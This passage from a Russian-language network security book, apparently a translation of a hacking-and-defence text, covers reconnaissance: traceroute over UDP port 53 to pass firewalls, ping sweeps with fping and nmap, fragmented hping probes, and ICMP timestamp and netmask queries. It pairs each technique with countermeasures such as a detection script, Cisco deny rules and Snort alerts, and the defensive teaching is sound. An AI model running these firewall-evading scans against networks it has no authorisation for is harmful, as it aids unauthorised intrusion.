    Необходимо подчеркнуть, что большинство версий traceroute систем UNIX по умолчанию отправляют пакеты UDP (User Datagram Protocol), а пакеты ICMP (Internet Control Messaging Protocol) — только в случае явного указания параметра -I. Однако в Windows NT для этих целей по умолчанию используются пакеты протокола ICMP, называемые эхо-запросами (echo request). Поэтому, если исследуемый узел блокирует либо пакеты UDP, либо ICMP, вы можете получать в разных операционных системах различные результаты. Среди других интересных параметров traceroute можно отметить параметр -q, который позволяет пользователю определять маршрутизацию с потерей источника запроса. Если вы уверены, что интересующий вас шлюз пропускает пакеты с измененным источником (что является очень большой ошибкой администратора этого шлюза), то можно попробовать включить данный режим, указав нужное количество участков (более подробную информацию можно получить с помощью команды man traceroute).
    Имеется и несколько других параметров, которые позволяют обойти устройства управления доступом. Например, параметр -р n утилиты traceroute дает возможность указать начальный номер порта UDP (л), который должен увеличиваться на 1 при каждой попытке отслеживания маршрута. Таким образом, мы не сможем использовать фиксированные номера портов, не модифицируя traceroute. К счастью, Майкл Шифман (Michael Schiffman) уже создал модуль обновления, который позволяет с помощью дополнительного параметра -S остановить автоматическое увеличение счетчика для traceroute версии 1.4а5 (ftp://ftp.ee.lbl.gov/traceroute-1. 4a5.tar. Z). Это позволяет в каждом отправляемом пакете использовать один и тот же номер порта в надежде на то, что устройство управления доступом пропустит эти пакеты во внутреннюю сеть. Как правило, для этих целей лучше всего подходит UDP-порт с номером 53 (запросы DNS). Поскольку многие узлы пропускают входящие запросы DNS, существует высокая вероятность того, что устройство управления доступом не среагирует на такую попытку проникновения. 

    [bash]$ traceroute 10.10.10.2
    traceroute to (10.10.10.2), 30 hops max, 40 byte packets
    1 gate (192.168.10.1) 11.993 ms 10.217 ms 9.023 ms
    2 rtrl.bigisp.net (10.10.12.13)37.442 ms 35.183ms 38.202ms
    3 rtr2.bigisp.net (10.10.12.14) 73.945 ms 36.336 ms 40.146 ms
    4 hssitrt.bigisp.net (10.11.31.14) 54.094 ms 66.162 ms 50.873 ms
    5 * * *
    6 * * *

    Из листинга видно, что попытка использования утилиты traceroute, которая по умолчанию отсылает пакеты UDP, была заблокирована брандмауэром.
    Теперь еще раз попробуем запустить утилиту traceroute, однако на этот раз будем использовать фиксированный порт UDP 53, который используется для запросов DNS.

    [bash]$ traceroute -S -p53 10.10.10.2
    traceroute to (10.10.10.2), 30 hops max, 40 byte packets
    1 gate (192.168.10.1) 10.029ms 10.027ms 8.494ms
    2 rtrl.bigisp.net (10.10.12.13) 36.673 ms 39.141 ms 37.872 ms
    3 rtr2.bigisp.net (10.10.12.14) 36.739 ms 39.516 ms 37.226 ms
    4 hssitrt.bigisp.net (10.11.31.14)47.352 ms '47.363 ms 45.914 ms
    5 10.10.10.2 (10.10.10.2),50.449ms 56.213ms 65.627ms

    Поскольку теперь пакеты не вызывают подозрения у устройства управления доступом (сегмент 4), они без проблем его преодолевают. Таким образом, мы можем зондировать узлы, находящиеся за устройством управления доступом, просто отправляя запросы по протоколу UPD в порт 53. Кроме того, если вы будете зондировать систему, которая опрашивает порт 53 на предмет поступления сообщений по протоколу UDP, вы не получите обычного сообщения ICMP о том, что данная система недоступна. Таким образом, если вы не увидели информации об узле, это означает, что пакеты дошли до цели.
    Все операции, которые мы проделывали до сих пор с утилитой traceroute, выполнялись в командной строке. Если вам по душе графический Интерфейс, то можно воспользоваться утилитой VisualRoute (www.visualroute.com) или NeoTrace (http://www. neotrace. com/). Утилита VisualRoute наглядно представляет каждый пройденный сегмент маршрута и связывает его с запросами whois. Хотя, эта утилита представляет получаемые данные в удобном формате, однако, как правило, ее возможностей для широкомасштабного зондирования больших сетей оказывается недостаточно.

    Существуют специальные приемы, позволяющие уточнить данные о списке ACL, используемом для конкретного устройства управления доступом. Одним из таких методов является сканирование протокола брандмауэра (firewall protocol scanning), о чем пойдет речь в главе 11, "Брандмауэры".

    Контрмеры: как пресечь зондирование сети



    В данной главе мы лишь слегка затронули такую обширную тему, как методы зондирования сети. В последующих главах мы снова вернемся к ней и поговорим о более серьезных методах. Однако уже сейчас можно сформулировать некоторые соображения о том, как предотвратить рассмотренные выше попытки зондирования. Во-первых, многие коммерческие системы выявления вторжений (NIDS — Network Intrusion Detection Systems) позволяют выявлять попытки зондирования такого рода. Кроме того, подобные вторжения можно выявить с помощью бесплатной программы Марти Рош (Marty Roach) (http://www.snort.org/). Если вы хотите принять меры и защититься от зондирования сети с помощью утилиты traceroute, обратите внимание на утилиту RotoRouter, написанную Хамблом (Humble) (http://packet storm, securify .com/linux/trinux/src/rr-l.0 . tgz). Эта утилита позволяет не только регистрировать входящие от утилиты traceroute запросы, но и генерировать ложные ответы. И наконец, в зависимости от общей политики безопасности вашей организации можно настроить пограничные маршрутизаторы таким образом, чтобы ограничить поток данных по протоколам ICMP и UDP только строго определенными узлами. Такой подход позволит свести риск проникновения во внутреннюю сеть посредством зондирования к минимуму.


    9. Резюме



    Резюме


    Итак, в распоряжении злоумышленника имеется целый ряд приемов, с помощью которых он может зондировать сеть или собирать о ней предварительную информацию. В данной главе мы лишь слегка затронули самые распространенные и типичные из этих приемов, поскольку новые средства и инструменты появляются чуть ли не ежедневно и любые детали могут быстро устаревать. Кроме того, все основные принципы предварительного сбора информации рассматривались на упрощенных примерах. На практике специалистам, возможно, придется столкнуться гораздо с более сложной задачей, состоящей в противостоянии сбору данных о десятках или сотнях доменов и их идентификации. Именно по этой причине мы в своей работе стараемся автоматизировать выполнение как можно большего числа задач, комбинируя сценарии оболочки, программы на языке Perl и другие средства. В Internet постоянно "рыщет" множество квалифицированных и опытных взломщиков, которых еще никто и никогда не ловил за руку. Поэтому не забывайте о том, что чем меньше информации о внутренней архитектуре будет доступно в глобальной сети и чем тщательнее будет выполняться мониторинг всех событий, тем сложнее взломщику будет проникнуть в сеть.


    Глава 2. Сканирование



    Глава 2. СКАНИРОВАНИЕ




    1. Сканирование



    Сканирование


    Если процесс предварительного сбора данных можно сравнить со скрытым наблюдением, цель которого — добыть как можно больше информации, не выдавая себя, то сканирование — это "разведка боем". Цель сканирования — выявить открытые "окна" и "двери". В предварительно собранной информации содержатся сведения об адресах подсетей и отдельных компьютеров, полученных с помощью запросов whois и переноса зоны. Информация, собранная на этом этапе, очень ценна для взломщика, поскольку содержит такие данные, как имена и фамилии сотрудников, номера телефонов, диапазоны IP-адресов, адреса DNS-серверов и почтовых серверов. Теперь можно приступать к выявлению тех компьютеров, которые подключены к сети и достижимы из Internet. Для этого будут использоваться разнообразные средства и приемы, такие как ping-прослушивание, сканирование портов и различные методы, позволяющие автоматизировать выполнение этих задач.
    Необходимо отметить, что факт наличия IP-адреса в перенесенной зоне еще не означает, что к соответствующему узлу можно получить доступ через Internet. Необходимо проверить каждый конкретный компьютер в отдельности и выяснить, подключен ли он к Internet и имеются ли на нем порты, находящиеся в состоянии ожидания запросов. Нам приходилось встречать немало неправильно настроенных DNS-серверов, которые предоставляли всем желающим адреса обслуживаемых ими частных сетей (например, 10.10.10.0). Поскольку такие адреса не маршрутизируются по Internet, вы понапрасну будете тратить время, пытаясь связаться с ними. Более подробная информация о том, какие адреса являются маршрутизируемыми, приведена в RFC 1918(http://www.ietf.org/rfc/rfcl918.txt).
    Теперь давайте перейдем ко второму этапу сбора информации — сканированию.

    Прослушивание сети с помощью утилиты ping



    Одним из основных этапов в определении структуры сети является ее автоматизированное прослушивание с помощью утилиты ping по диапазону IP-адресов или адресам подсетей. Цель такого прослушивания — определить, имеется ли у отдельных компьютеров подключение к Internet. Утилита ping отправляет пакеты ICMP ECHO (тип 8) указанному компьютеру и ожидает ответного пакета ICMP ECHO_REPLY (тип 0). Получение такого ответа говорит о том, что компьютер в данный момент подключен к Internet. Хотя при некоторой настойчивости с помощью утилиты ping можно определить количество постоянно подключенных к Internet компьютеров в небольшой и даже средней сети, ручной перебор сетевых адресов будет малоэффективен, если необходимо обследовать корпоративную сеть крупной организации.
    Для выполнения ping-прослушивания можно воспользоваться любым из .G® \*-» многочисленных средств, разработанных как для системы UNIX, так и для i-""""" Windows NT. В мире UNIX одним из самых надежных и проверенных методов такого прослушивания является использование утилиты fping (http:/ packetstorm security.com/Exploit_Code_Archive/fping.tar.gz). В отличие от других подобных утилит, которые перед переходе к тестированию следующего компьютера ожидают ответа на ранее посланный запрос, утилита fping рассылает все запросы одновременно, а затем ожидает ответа сразу от всех узлов. Именно поэтому утилита fping обеспечивает гораздо более высокую скорость прослушивания большого диапазона IP-адресов, чем обычная утилита ping. Утилита fping была написана специально для использования в сценариях оболочек совместно с утилитой gping (http://www.hacking-exposed.com/tools/tools.html), которая входит в пакет, распространяемый вместе с fping. Утилита gping генерирует список IP-адресов, передаваемых на вход fping для прослушивания. Листинг использования утилиты gping для сетей класса А, В или С может показаться слегка непонятным, поэтому рассмотрим его подробнее.

    [tsunami ]'$ gping
    usage: gping aO aN bO bN cO cN dO dN
    gping a bO bN cO cN dO dN
    gping a b cO cN dO dN
    gping a b с dO dN
    gping abcd

    В качестве параметров утилите gping необходимо передать диапазон IP-адресов. На основании этого диапазона будет генерироваться листинг, в котором адреса перебираются друг за другом. Каждый октет передаваемого IP-адреса должен отделяться от остальных пробелами. Например, если мы собираемся генерировать IP-адреса для сети класса С, нам необходимо просто добавить 254 в качестве последнего параметра. Это позволит утилите перебрать все адреса от 192.168.1.1 до 192.168.1.254. Предположим, что эта сеть не содержит подсетей и использует маску подсети 255.255.255.0. Кроме того, мы не будем проверять адрес самой сети 192.168.1.0 и адрес широковещательной рассылки 192.168.1.255. Следует избегать применения утилиты ping к адресам широковещательной рассылки, поскольку это может привести к отказу, или так называемому состоянию DoS (denial of service), если ответный пакет одновременно будет сгенерирован многими узлами (более подробная информация о том, как установить маску подсети узла, приведена в документации по запросам ICMP). С использованием утилиты gping можно сгенерировать перечень адресов, которые затем будут использоваться утилитой fping.

    [tsunami] gping 192 168 1 1 254
    192.168.1.1
    192.168.1.2
    192.168.1.3
    192.168.1.4
    192.168.1.5
    192.168.1.251
    192.168.1.252
    192.168.1.253
    192.168.1.254

    Теперь в нашем распоряжении имеется список всех узлов, которые могут находиться в исследуемой сети класса С. Осталось лишь перенаправить вывод утилиты gping на вход утилиты fping, которая выполнит прослушивание сети и определит, какие компьютеры в данный момент подключены к сети.

    [tsunami]? gping 192 168 1 1 254 | fping -a
    192.168.1.254 is alive
    192.168.1.227 is alive
    192.168.1.224 is alive
    192.168.1.3 is alive
    192.168.1.2 is alive
    192.168.1.1 is alive
    192.168.1.190 is alive

    Параметр -а утилиты fping предназначен для включения режима, в котором выводится информация обо всех активных в данный момент компьютерах сети. Если нужно, утилита может выводить и информацию об именах узлов. Этот режим включается с помощью параметра -d. По нашему мнению, параметр -а лучше всего использовать в сценариях оболочки, а параметр -d — при исследовании сети на предмет поиска определенных узлов. Среди других параметров необходимо упомянуть -f, который позволяет вводить адреса из заранее подготовленного файла, а также -h, с помощью которого можно получить перечень всех параметров утилиты и режимов их использования. Еще одной утилитой, о которой мы будем много говорить в этой книге, является утилита nmap, созданная хакером по имени Федор (Fyodor) (www.insecure.org/nmap). Более подробно эта утилита будет рассматриваться ниже в этой главе, однако будет нелишним упомянуть, что, кроме всех остальных возможностей, данная утилита также позволяет выполнить прослушивание сети. Для включения соответствующего режима необходимо указать параметр -SP.

    [tsunami] nmap -sP 192.168.1.0/24
    Starting nmap V. 2.53 by fyodor@insecure.org
    ( www.insecure.org/nmap/)
    Host (192.168.1.0) seems to be a subnet broadcast
    address (returned 3 extra pings).
    Host (192.168.1.1) appears to be up.
    Host (192.168.1.10) appears to be up.
    Host (192.168.1.11) appears to be up.
    Host (192.168.1.15) appears to be up.
    Host (192.168.1.20) appears to be up.
    Host (192.168.1.50) appears to be up.
    Host (192.168.1.101) appears to be up.
    Host (192.168.1.102) appears to be up.
    Host (192.168.1.255) seems to be a subnet broadcast
    address (returned 3 extra pings).
    Nmap run completed — 256
    IP addresses (10 hosts up) scanned in 21 seconds

    Что касается приверженцев Windows, они также не остались без внимания. В частности, имеется такая бесплатная утилита, как Finger (рис. 2.1), написанная хакерами из группы Rhino9 (http://www.nmrc.org/files/snt/). Эта утилита является одной из самых быстрых в своем классе. Как и fping, утилита Finger одновременно рассылает несколько ICMP-пакетов ECHO, а затем ожидает поступления ответов. Кроме того, Finger позволяет также получать имена узлов и сохранять результаты своей работы в файле. Такой же скоростью, как и Finger, обладает коммерческий продукт Ping Sweep, предлагаемый компанией SolarWinds (www.solarwinds.net). Поразительная скорость работы Ping Sweep объясняется тем, что данная программа позволяет устанавливать время задержки между передаваемыми пакетами (delay time). Установив это значение равным 0 или 1, можно просканировать всю сеть класса С и получить имена ее узлов менее чем за 7 секунд. Однако при использовании этих средств соблюдайте осторожность, поскольку в этом случае можно значительно снизить пропускную способность какого-нибудь низкоскоростного канала, например канала ISDN с пропускной способностью 128 Кбит/с или Frame Relay (не говоря уже о спутниковом или инфракрасном канале).
    Среди других утилит Windows, предназначенных для прослушивания сети, можно отметить WS_Ping ProPack (www.ipswitch.com) и Netscan Tools (www.nwpsw.com). Хотя возможностей этих утилит вполне достаточно для прослушивания небольших сетей, они значительно медленнее Finger и Ping Sweep. Кроме того, не забывайте, что утилиты с графическим интерфейсом, несмотря на удобство их использования, лишают вас возможности их применения в сценариях и автоматизированных процедурах.
    Возможно, вы хотите спросить, как поступать, если исследуемый узел блокирует сообщения ICMP? Хороший вопрос. Такой подход зачастую применяется на тех узлах, администраторы которых заботятся о безопасности. Однако, несмотря на блокировку пакетов ICMP, существуют дополнительные средства и методы, позволяющие определить, подключен ли такой узел к сети или нет. Вместе с тем необходимо отметить, что все эти средства оказываются не такими точными и эффективными, как обычные утилиты семейства ping.



    Рис. 2.1. Утилита finger — одна из самых быстрых утилит ping-прослушивания, которая к тому же распространяется бесплатно

    В тех случаях, когда обмен данными по протоколу ICMP заблокирован, в первую очередь применяется метод сканирования портов (port scanning), который более подробно рассматривается ниже в этой главе. Просканировав стандартные порты каждого потенциального IP-адреса сети, можно определить, какие узлы подключены к сети. Если порт открыт (opened mode) или находится в режиме ожидания (listening mode), значит, по данному адресу находится подключенный к Internet узел сети. Недостатками этого метода являются большие временные затраты и некоторая неопределенность результата (если по какому-то адресу не удалось обнаружить ни одного порта, то это еще не означает, что соответствующий узел не подключен к Internet). Одной из утилит, которые можно использовать для сканирования портов, является nmap. Как уже упоминалось, с помощью этой утилиты можно проводить ICMP-прослушивание, однако этим перечень ее возможностей далеко не исчерпывается. В частности, эта утилита позволяет выполнять так называемое TCP-прослушивание сканированием (TCP ping scan). Данный режим включается с помощью параметра -рт и указания номера порта, например 80. Выбор порта с номером 80 обусловлен тем, что в подавляющем большинстве случаев именно он используется узлами сети для обмена данными через пограничные маршрутизаторы или брандмауэры с компьютерами, расположенными в так называемой демилитаризованной зоне (DMZ — demilitarized zone). При использовании указанного параметра утилита рассылает узлам исследуемой сети пакеты АСК, а затем ожидает поступления пакетов RST, что свидетельствует о том, что узел подключен к Internet.

    [tsunami] nmap -sP -PT80 192.168.1.0/24
    TCP probe port is 80
    Starting nmap V. 2.53
    Host (192.168.1.0) appears to be up.
    Host (192.168.1.1) appears to be up.
    Host shadow (192.168.1.10) appears to be up.
    Host (192.168.1.11) appears to be up.
    Host (192.168.1.15) appears to be up.
    Host (192.168.1.20) appears to be up.
    Host (192.168.1.50) appears to be up.
    Host (192.168.1.101) appears to be up.
    Host (192.168.1.102) appears to be up.
    Host (192.168.1.255) appears to be up.
    Nmap run completed (10 hosts up) scanned in 5 seconds

    Как видно из приведенного выше листинга, этот метод определения подключенных к Internet узлов очень эффективен, даже если на них блокируется передача пакетов ICMP. С помощью утилиты nmap имеет смысл провести несколько подобных проверок, тестируя такие стандартные порты как SMTP (25), POP (110), AUTH (110), IMАР (143) или другие порты, которые, по вашим сведениям, могут быть уникальными на каком-либо компьютере исследуемой сети.
    Еще одной утилитой, специально предназначенной для TCP-прослушивания, является утилита hping (http://www.kyuzz.org/antirez/). По возможностям она даже превосходит утилиту nmap. Утилита hping позволяет пользователям управлять параметрами протокола TCP, что может обеспечить проникновение отправляемых пакетов даже через некоторые устройства управления доступом. Так, установив порт назначения с помощью параметра -р, можно обойти некоторые устройства управления доступом точно так же, как это было сделано с применением утилиты traceroute в главе 1. Поэтому утилита hping может с успехом служить не только для TCP-прослушивания, но и преодолевать преграды некоторых устройств управления доступом благодаря возможности фрагментации пакетов.

    [tsunami] hping 192.168.1.2 -S -p 80 -f
    HPING 192.168.1.2 (ethO 192.168.1.2):
    S set, 40 data bytes
    60 bytes from 192.168.1.2:
    flags=SA seq=0 ttl=124 id=17501 win=0 time=46.5
    60 bytes from 192.168.1.2:
    flags=SA seq=l ttl=124 id=18013 win=0 time=169.1

    В некоторых случаях простые устройства управления доступом не могут корректно обрабатывать фрагментированные пакеты, что позволяет им проходить через такие устройства и достигать интересующего взломщика адреса. Обратите внимание, что в случае, когда порт открыт, возвращаются флаги TCP SYN (s) и дек (А). Утилиту hping очень легко использовать в сценариях оболочки с параметром счетчика пакетов -cN, где N — это количество пакетов, которые нужно отправить в Internet, прежде чем переходить к выполнению следующей команды сценария. Хотя данный метод и не обладает такой скоростью, как описанные выше методы ICMP-прослушивания, в некоторых случаях только он может помочь выяснить конфигурацию сети. Более подробно утилита hping рассматривается в главе 11, "Брандмауэры".
    Последним из средств прослушивания рассмотрим утилиту icmpenum хакером Симплом Номадом (Simple Nomad) (http://www.nmrc.org/files/sunix/icmpenum-1.1.tgz). Эту утилиту удобно использовать для определения архитектуры сети. Утилита icmpenum позволяет быстро выявить подключенные к сети компьютеры, передавая стандартные ICMP-пакеты ECHO, а также ICMP-запросы TIME STAMP REQUEST и INFO. Если входные пакеты ECHO не пропускаются пограничным маршрутизатором или брандмауэром, то подключенные узлы можно по-прежнему идентифицировать с помощью альтернативных пакетов ICMP.

    [shadow] icmpenum -i2 -с 192.168.1.0
    192.168.1.1 is up
    192.168.1.10 is up
    192.168.1.11 is up
    192.168.1.15 is up
    192,168.1.20 is up
    192.168.1.103 is up

    В приведенном примере сеть класса С (192.168.1.0) была протестирована с использованием ICMP-запроса TIME STAMP REQUEST. Однако реальная мощь утилиты icmpenum заключается в возможности идентификации узлов с помощью ложных пакетов, что позволяет избежать обнаружения злоумышленника. Это возможно благодаря тому, что утилита icmpenum позволяет генерировать ложные пакеты с использованием параметра -s и пассивно ожидать отклика при указании параметра -р.
    Подводя итог, можно отметить, что IСМР- или TCP-прослушивание позволяет точно установить, какие компьютеры сети подключены к Internet. Так, в рассматриваемом примере мы установили, что из 255 потенциальных адресов сети класса С к Internet подключены лишь несколько компьютеров. Выявленные узлы становятся предметом первоочередного внимания в дальнейших исследованиях. Таким образом, мы значительно сузили область поиска, что позволяет сэкономить время и силы для более эффективных действий.


    1.gif

    Изображение: 

    2. Контрмеры: защита от прослушивания сети



    Контрмеры: защита от прослушивания сети


    Поскольку прослушивание сети в лучшем случае может вызывать раздражение, то очень важно выявлять все попытки таких действий. В зависимости от принятой в организации политики обеспечения безопасности можно также заблокировать прохождение пакетов, передаваемых при ping-прослушивании. В этом разделе рассматриваются обе возможности.

    Выявление факта прослушивания



    Как уже говорилось, ICMP- и TCP-прослушивание является общепринятым методом исследования сети перед непосредственной попыткой проникновения в сеть. Поэтому выявление факта прослушивания очень важно с точки зрения возможности получения информации о потенциальном месте проникновения и источнике угрозы. Один из основных методов выявления прослушивания состоит в использовании сетевой программы выявления вторжений, такой как Network Flight Recorder (NFR), или программы, установленной на исследуемом взломщиком узле. Ниже приведен алгоритм, который можно реализовать в программе, предназначенной для выявления факта прослушивания.

    # Обнаружение прослушивания с помощью ICMP/Ping
    # Автор — Стюарт Мак-Клар (Stuart McClure)
    # Эта программа предназначена для выявления
    ping-сканера, изучающего вашу сеть
    # Для получения наилучших результатов
    # установите нужные значения maxtime и maxcount.
    ping_schema = library_schema::new(1,["time", "ip",
    "ip","ethmac", "ethmac" ],
    scope());
    count = 0;
    maxtime =10; # Время в секундах
    maxcount =5; # Количество ICMP-запросов ECHO или запросов ARP,
    # которое рассматривается как допустимое
    dest = 0;
    source = 0;
    ethsrc = 0;
    ethdst = 0;
    time = 0;
    filter icmp_paskets icmp( )
    {
    if (icmp.type == 0x08) # Проверка на ICMP-пакеты ECHO.
    {
    if ((source == ip.src) && (dest != ip.dst)) # Попался!
    {
    count = count + 1;
    time = system.time;
    }
    else
    count = 1;
    dest = ip.dest;
    source = ip.src;
    ethsrc = eth.src;
    ethdst = eth.dst;
    } .
    on tick = timeout ( sec: maxtime, repeat) call checkit;
    }
    func checkit;
    {
    if (count >= maxcount)
    {
    echo ("Обнаружен.ping-сканнер! Время: ", time, "\n");
    record system.time, source, dest, eth.src, eth.dst
    to the_record_ping; count = 0; dest = 0;
    } else
    {
    dest = 0; count = 0;
    }
    return;
    }
    the_record_ping=recorder("bin/histogram
    packages/sandbox/pingscan.cfg",
    "ping_schema" );

    Что касается защиты на уровне отдельного узла, для этого можно с успехом применять утилиты UNIX, которые позволяют выявлять и регистрировать попытки прослушивания. Если, просматривая файл журнала, созданный такой утилитой, вы обнаружите массированные ICMP-запросы ECHO, исходящие из одной и той же сети или от одного и того же узла, это, скорее всего, означает, что вашу сеть кто-то исследует. На такие факты необходимо обращать самое пристальное внимание, так как после изучения сети обычно предпринимается реальная попытка проникновения.
    К сожалению, найти аналогичные утилиты для платформы Windows достаточно сложно. Одним из немногих бесплатных или условно бесплатных пакетов, заслуживающих внимания, является Genius 3.1. Краткую информацию о новой версии этого программного продукта можно найти по адресу http://softseek.com/Internet/ General/Review_20507_index.html, а более подробные сведения о нем и загружаемый файл содержатся по адресу http: //www.indiesoft.com/. Эта программа не позволяет регистрировать попытки ping-прослушивания, а предназначена лишь для выявления TCP-сканирования определенного порта. Среди коммерческих пакетов аналогичного назначения можно отметить BlackICE от компании Network ICE (http://www.networkice.com). Этот программный продукт позволяет не только обнаруживать факты JCMP- и TCP-прослушивания, но и решать много других задач. В табл. 2.1 перечислены некоторые дополнительные утилиты, которые могут значительно облегчить выявление попыток прослушивания вашей сети.

    Таблица 2.1.Некоторые утилиты UNIX, предназначенные для зашиты от прослушивания на уровне узла

    Программа
    Ресурс
    Scanlogd
    http : //www.openwall.com/scanlogd
    Courtney 1 .3
    ftp://ciac.llnl.gov/pubс/сiac/sectools /unix
    Ippl1.4.10
    http: //pltplp.net/ippl/
    Protolog 1.0.8
    http: //packet storm. securify.com/UNIX/loggers/protolog-1.0.8. tar.gz

    Предотвращение прослушивания



    Если обнаружение факта прослушивания имеет столь большое значение, то что тогда говорить о предупреждении таких попыток! Мы рекомендуем очень внимательно оценить, насколько важен для вашей организации обмен данными по протоколу ICMP между узлами вашей сети и Internet. Имеется много разнообразных типов сообщений ICMP, ECHO и ECHO_REPLY — лишь два из них. В большинстве случаев нет никакой необходимости разрешать обмен данными между узлами сети и Internet с использованием всех имеющихся типов сообщений. Практически все современные брандмауэры обладают возможностью отфильтровывать пакеты ICMP, поэтому единственная причина, по которой они могут проходить во внутреннюю сеть,— та или иная производственная необходимость. Даже если вы твердо убеждены в том, что нельзя полностью заблокировать протокол ICMP, обязательно заблокируйте те типы сообщений, которые вам не нужны для работы. Как правило, вполне достаточно, чтобы с зоной DMZ можно было взаимодействовать посредством сообщений ECHO_REPLY, HOST UNREACHABLE И TIME EXCEEDED. Кроме того, с помощью списка управления доступом (ACL — Access Control List) можно разрешить обмен сообщениями по протоколу ICMP только с несколькими IP-адресами, например, принадлежащими вашему провайдеру Internet. Это позволит провайдеру, при необходимости, проверить качество связи, но при этом проникновение посторонних извне в компьютеры, подключенные к Internet, будет значительно затруднено. Необходимо всегда помнить, что несмотря на удобство и мощь протокола ICMP с точки зрения диагностирования сетевых проблем, он с успехом может использоваться и для создания таких проблем. Разрешив неограниченный доступ по протоколу ICMP во внутреннюю сеть, вы тем самым предоставляете взломщикам возможность реализовать нападение типа DoS (например с помощью Smurf-метода). Более того, если взломщику удастся проникнуть в один из ваших компьютеров, он может через "потайной ход" в операционной системе с помощью таких программ, как loki, организовать скрытое тунеллирование данных, передаваемых по протоколу ICMP. Более подробная информация о loki приведена в журнале Phrack Magazine, том 7, выпуск 51 за 1 сентября 1997 года, статья 06(http://phrack.infonexus.com/search.phtml?view&article=p51-6).
    Другая интересная концепция, предложенная Томом Пташеком (Tom Ptacek) и перенесенная в среду Linux Майком Шифманом (Mike Schiffman) заключается в использовании процесса pingd. Демон pingd, запущенный на компьютере пользователя, обрабатывает все поступающие на данный компьютер запросы ICMP_ECHO и ICMP_ECHOREPLAY. Для реализации такого подхода нужно отказаться от поддержки обработки запроса ICMP_ECHO на уровне ядра и реализовать ее на уровне пользователя с помощью служебного процесса, обеспечивающего работу сокета ICMP. Таким образом, появляется возможность создания механизма управления доступом на уровне отдельного компьютера. Утилита pingd имеется в версии BSD (http://www.enteract.com/~tqbf/goodies.html) и в системе Linux (http://www.2600.net/phrack/p52-07.html).

    Запросы IСМР



    Если говорить о возможностях протокола ICMP для сбора информации о сети, то прослушивание с помощью утилиты ping (или, другими словами, с помощью пакетов ECHO, пересылаемых по протоколу ICMP), — это только верхушка айсберга. Просто обмениваясь пакетами ICMP с интересующей вас системой, о ней можно получить любую информацию. Например, с помощью таких утилит UNIX, как icmpquery (http://packetstorm.securify.com/UNIX/scanners/icmpquery) или icmpush (http://packetstorm.security.com/UNIX/scanners/icmpush22.tgz), можно узнать системное время удаленного узла (т.е. часовой пояс, в котором он находится). Для этого нужно отправить по протоколу ICMP сообщение типа 13 (TIMESTAMP). Точно так же, обратившись к определенному устройству с ICMP-запросом типа 17 (ADDRESS MASK REQUEST), можно узнать маску подсети. Знание маски подсети сетевой карты позволяет определить все существующие подсети. Например, используя маску подсети, усилия можно сосредоточить на определенной подсети и избежать необходимости обращения к адресам рассылки широковещательных сообщений. Утилита icmpquery позволяет запрашивать как системное время, так и маску подсети.

    icmpquery <query> [-B] [-f fromhost] [-d delay] [-T time] targets
    Здесь параметр query принимает одно из следующих значений:
    -t : ICMP-запрос системного времени (по умолчанию);
    -m : ICMP-запрос маски подсети.
    delay — задержка между пакетами в миллисекундах,
    targets — список имен или адресов исследуемых узлов,
    time — время в секундах, в течение которого следует ожидать
    отклика. По умолчанию используется значение 5 с.
    -В — включение режима широковещательной рассылки. В этом режиме
    утилита ожидает в течение периода, определенного параметром
    time, а затем выводит отчет о поступивших ответах.
    Если вы используете модем, установите
    значения параметров -d и -Т большими,
    чем установленные по умолчанию.

    Например, чтобы с помощью icmpquery узнать системное время маршрутизатора, воспользуйтесь следующей командой.

    [tsunami] icmpquery -t 192.168.1.1
    192.168.1.1 : 11:36:19

    Запрос на получение маски подсети выглядит следующим образом.

    [tsunami] icmpquery -m 192.168.1.1
    192.168.1.1 : OxFFFFFFEO

    Далеко не все маршрутизаторы/узлы отвечают на ICMP-запросы TIMESTAMP или NETMASK. Поэтому с помощью утилит icmpquery и icmpush на различных узлах можно получить разные результаты.

    Контрмеры: защита от ЮМР-запросов



    Одним из самых лучших методов защиты является блокирование IOМР-запросов тех типов, которые способствуют разглашению информации о сети за ее пределами. Как минимум, на пограничном маршрутизаторе необходимо заблокировать прохождение во внутреннюю сеть пакетов TIMESTAMP (ICMP-сообщение тип 13) и ADDRESS MASK (тип 17). Например, если в качестве пограничного маршрутизатора используется маршрутизатор Cisco, запретите ему отвечать на указанные запросы, добавив следующие строки в список управления доступом.

    access-list 101
    deny icmp any any 13 ! timestamp request
    access-list 101 deny icmp
    any any 17 ! address mask request

    Для выявления рассмотренных выше видов деятельности можно также воспользоваться сетевыми системами выявления вторжений V(NIDS), например, программой Марти Рош (Marty Roach) (http://www.snort.org/). При выявлении такого типа вторжений будет выведена следующая информация.

    [**] PING-ICMP Timestamp [**]
    05/29-12:04:40.535502 192.168.1.10 -> 192.168.1.1
    ICMP TTL:255 TOS:0x0 ID:4321
    TIMESTAMP REQUEST

    Сканирование портов



    С помощью ICMP- или TCP-прослушивания мы установили, какие компьютеры исследуемой сети подключены к Internet. Кроме того, вся требуемая информация собрана также и с использованием запросов ICMP. Теперь можно перейти к этапу сканирования портов этих компьютеров. Сканирование портов (port scanning) — это процесс пробного подключения к портам TCP и UDP исследуемого компьютера с целью определения, какие службы на нем запущены и обслуживаются ли ими соответствующие порты. Обслуживаемые порты могут находиться в работающем состоянии или в состоянии ожидания запроса (listening mode). Определение портов, находящихся в состоянии ожидания запроса, — этап, имеющий определяющее значение для последующего выяснения типа используемой операционной системы, а также работающих на компьютере прикладных программ. Активные службы, находящиеся в состоянии ожидания, могут предоставить взломщику возможность получить несанкционированный доступ. Это обычно происходит в том случае, когда система безопасности компьютера не настроена должным образом или в программном обеспечении имеются хорошо известные изъяны в системе защиты. За последние несколько лет средства и методы сканирования портов были значительно усовершенствованы. Учитывая ограниченный объем книги, мы рассмотрим лишь самые популярные из них, с помощью которых можно получить значительную часть важной информации. Теперь мы уже не будем пытаться определить, подключен ли тот или иной компьютер к Internet, как это делалось ранее. Для упрощения задачи будем считать, что мы это уже установили однозначно и сосредоточимся лишь на методике выявления портов, находящихся в состоянии ожидания, или возможных точек проникновения в исследуемую систему.
    При сканировании портов решается несколько задач, связанных с изучением системы защиты соответствующего узла. Среди этих задач можно выделить следующие.

    •  Идентификация TCP- и UDP-служб, запущенных на исследуемом узле.
    •  Идентификация типа операционной системы, установленной на исследуемом узле. 
    •  Идентификация приложений или версий определенных служб.



    3. Типы сканирования



    Типы сканирования


    Прежде чем перейти к описанию конкретных средств, используемых для сканирования портов, необходимо уделить немного времени обзору методов сканирования, известных в настоящее время. Одним из пионеров реализации различных методов сканирования является ранее упоминавшийся Федор (Fyodor). Многочисленные приемы сканирования были реализованы им в утилите nmар. Многие из описанных в данной книге методов сканирования были предложены самим Федором.

